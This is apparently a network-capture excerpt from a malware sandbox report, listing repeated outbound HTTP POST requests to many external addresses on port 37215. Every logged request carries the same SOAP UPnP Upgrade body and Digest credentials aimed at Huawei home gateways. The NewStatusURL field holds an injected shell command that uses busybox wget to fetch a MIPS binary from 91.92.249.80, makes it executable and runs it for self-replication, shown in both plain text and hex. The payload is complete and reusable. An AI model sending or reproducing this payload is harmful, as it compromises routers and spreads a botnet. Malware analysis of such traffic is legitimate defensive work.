                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1528192.168.2.2338002157.27.92.8637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.482517004 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1529192.168.2.2360940187.228.55.13537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.482527018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1530192.168.2.2336394197.249.175.14737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.482831955 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1531192.168.2.235905641.100.162.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.482856989 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1532192.168.2.2355800157.121.44.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.483127117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1533192.168.2.2338524157.157.5.2437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.483181000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1534192.168.2.233843041.75.138.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.483546019 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1535192.168.2.2345522105.192.88.3137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.483552933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1536192.168.2.2354394160.251.78.6037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.483818054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1537192.168.2.2340870197.127.19.3537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.483906031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1538192.168.2.2355724197.96.20.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.483916998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
